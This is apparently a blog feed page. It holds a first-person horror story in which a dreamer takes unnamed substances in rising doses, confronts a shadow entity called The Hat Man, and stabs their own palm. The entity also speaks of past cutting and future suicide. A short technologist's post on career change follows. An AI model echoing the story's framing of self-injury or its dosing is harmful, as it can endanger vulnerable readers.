I'd reached an accord with the spiders. I'd invited them into my corner of the Dreamlands and built them a playground, per their specifications. Crevices, overhangs, shadowy corners, boxes upon boxes, a leaky pipe, piles of clothes, abandoned cupboards, attic full of furniture and old books, a nightmare house all to themselves. And if the occasional dreamer stumbled upon it, even better. So they acted as my protectors in the Gloam instead of mere watchers or worse, tormentors. They were completely unaware of the “side passage” I was seeking to the Fugue, the place just between dreams and wakefulness. I was determined to ask The Hat Man, something they advised me against. Repeatedly. Nothing was worth what it might cost, they told me. The Hat Man does not have friends among humans or see them as equals. Even Dreamers are beneath Him. We are nothing but toys. And He enjoys breaking His toys. The spiders were afraid of Him even as they swarmed at His call to suck on the juices of his cast-offs and conquests. I appreciated their concern. Truly, I was touched by it. But, I needed to find Him. Again. I had seen Him. Once. At 600 mg, when the walls vibrated until they were transparent and He was there, on the other side, watching. I wasn't deep enough to make contact. I couldn't even see His eyes. But. When I was growing up, the back yards in our neighborhood, on my side of the street, all shared a low spot in the far back, by the fence-line. When it rained, water rushed down that trough like a river. Sometimes, we'd catch earthworms that came up to avoid drowning. We'd collect them in a big bucket and play with them until the rain stopped. Then we'd dump them back out on the mud. When The Hat Man looked at me with eyes I could not see, for just a moment, I was a struggling worm, fleeing for my life, being plucked up and dropped in a foreign place surrounded by the screams of my peers. For just a moment. Then I was dumped back into my bedroom. The spiders covered me in their warmth, eight times a thousand clawed feet massaging me in comfort. Still, I shivered. That was the Thing I was going to convince to help me? I was like garbage to It, like dust. This place, the Gloam, was not the Dreamlands and all my learned skills were muted or easily wiped away.

But, I had to try. I am trying.

At 750 mg, tonight, right now, the walls drip black stinking ichor, like a busted septic tank oscillating in the static of a scrambled cable channel. “You think you're the smartest motherfucker in the world,” my step dad calls out to me. He hasn't been part of my life in decades, but he calls out all the same. “And you can't even find the Fugue – get out here you stupid faggot – bring me a beer before I come in there – don't make me come in there” I'm twelve years old again. I want to hide in the closet. I want to cry quiet tears. I want to climb a tree. Instead I pick up my hunting knife, the one I inherited, the one that's tasted blood, that's been honed and sharpened. I stand and the floor sucks me in, sinking me up to my knees. Mud. Sucking and plopping as I trudge forward. The spiders have fled, replaced by hostile snakes, flicking their tongues, rattling their tails. Darting their heads to force me to the wall. Not the door. Not the closet. To the wall with the mirror. I accidentally look at my reflection. I know I shouldn't. I try not to, but I can't blink, can't turn away. Twitching muscle, exposed nerves, dripping blood as my skin is flayed by the air like a million tiny razor blades, and the mud a seeping infection. I can't scream. I swing the knife at the mirror and am pulled through, tumbling in cold, stale air. Landing on black obsidian. You never stood up for yourself. It's my own voice. Inside my head. You could have saved him, you know. If you really believed. No. Not in my head, spinning around me, close, invisible. Stand up. Don't be a baby. Stand up! On my knees, I see Him. The Hat Man. He's right next to me. He's impossibly far away. A living shadow, like a charcoal smudge on reality with two empty white sockets for eyes and no other features save the tell-tale hatlike shape. I told the kittens how warm it was under the hood. I unlocked the gate for the bike thieves. I helped them dig up the grave and took the first bite. Sometime in the next month, I'm going to crash your car. Why did you want to be known to me? In a few years, less than a dozen, you will be diagnosed with Stage 2 cancer. I know who your soulmate is and I've already poisoned her against you. You wear glasses now but your eyesight will continue to get worse until you are legally blind, just like your aunt, far before your time. I am the reason mosquitoes seek you out. I gave you the choice and you did what I wanted. Time doesn't work like that for you. Here. Defend yourself. My own voice has been circling me, taunting me, saying so much overlapping, blending together, backwards and forwards. He is telling the truth. In my own voice. I tense and call upon Dream Logic long enough to float into the air, upright and a few inches off the ground. I reach out to push Him away. To bring Him closer. But He stays everywhere in between. I lift my hands to call lightning but my fingertips only drip with tar. “I just want my night terrors back,” I squeak. “I just want to see them again.” Now that I know you, I have always known you. My joy, my sustenance, is your misery. Not pain. Not loss. Not anger. But deep longing, unquenchable regret, languishing indecision. You should have died when you cut yourself so deeply in secret shame, but I saved you. I saved you so I could enjoy your suffering. I will always save you when there is more hope I can siphon and dreams I can shatter. Only when there is nothing left will I let you take your own life. And you will. You already have. I suddenly feel the knife in my right hand. It was there the whole time. I hold it up. The shining steel reflecting non-existent light, glinting to remind me of its reality. I swipe toward The Hat Man but He is nowhere. The blade leaves a rainbow trail of light in its wake. I try again. He is always ahead or behind. And again. He isn't even laughing or taunting. He just is and then isn't and then is again. I remember what I know of The Shadow Things that The Hat Man seems to rule. I look at my left palm, flexing my fingers, before stabbing myself with the knife. Pain, like ice, then fire. My blood swims out as writhing tentacles, reaching toward The Hat Man. Then an explosion in all directions, faster than I can see. Pulling my essence along. I feel the walls and ceiling all at once. Smaller than it seemed. Is The Hat Man even here? Was He ever? A presence like a bug. Like a projection or a speaker. A knob, a protrusion. My body of blood tentacles grips it, pulls it from the wall. And crushes it. I'm on my back, naked, covered in sweat, lying on top of my comforter back in my bedroom. My left hand throbs, oozing thick blood. My throat is so raw I can scarcely swallow. I feel as if nails are being driven into my temples. I'm crying. I hear the spiders scurry, but the now opaque walls no longer move. The floor appears solid. I see myself as expected in the mirror.

The lukewarm shower calms my nerves, my breathing. But I still hear my own voice asking me why I wanted to make myself known. Does He even have a voice of His own? As the cut on my hand clots exceptionally fast, as my headache clears, I know I am seen. I am known. From cradle to grave.

#WhenIDream #Dreams #Dreaming #Dreamlands #Writer #Writing #Writers #WritingCommunity #ShortFiction #Fiction #Paranormal #TheHatMan #TheGloam #ShadowPeople #ShadowThings #NightTerrors #SleepParaylsis #HypnagogicHallucinations

CC BY-NC-SA 4.0 This work is licensed under the Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License

 
Read more...

from Mudd

Starting a new blog to document my progress in modern tech

There's a term that a character uses in a book named something like “churn” but the classic interpretation is when customers just stop using a product. My skills, I've noticed in the last eight years, are generalist and I'm capable of doing lots of tasks. However, it seems having the skills is now just.. “expected.” I'm being churned!

I can code and document/write technically. I can do databases, firewalls, networking. I've built home labs (still do!) to keep up to date. I learned how to do things with the ELK stack when documentation on just getting started was minimal if not missing (for the current version that just released, that was). I'm learning how to do proper API and backend engineering now, and it's really neat.

I can do DFIR, imaging, examinations, manual carving. Scripting, reverse engineering, finances, woodworking/carpentry are in my bag of skills. Heck, if it's anything dealing with technology in the years I've been alive, I've used it, dabbled with it, implemented it and administrated it in some form or fashion. Heck, give me permission and I'll pick your locks you need open.

Lately, though, what's EDR? XDR? Why is suddenly everyone looking for SOC jobs? Why are there suddenly 300 certifications for things? Why is everything suddenly about blockchains? Didn't we figure out the scalability of this was a mess? Why is everything using ML and LLMs to generate.. everything?

What did I miss!? WHAT YEAR IS IT!?

Rust, though, is pretty cool. I like it. Along with a lot of other programming languages, but with Rust I can write code that I can be proud of when it works.

I'll write my musings here. Apparently having soft skills is a thing supersede actual skills. I feel like I need a Rosetta Stone for translating my old skills to what new jobs want and what titles they apply to. I guess I'll also need to specialize in something, but I like being able to do every part to some degree.

 
Read more...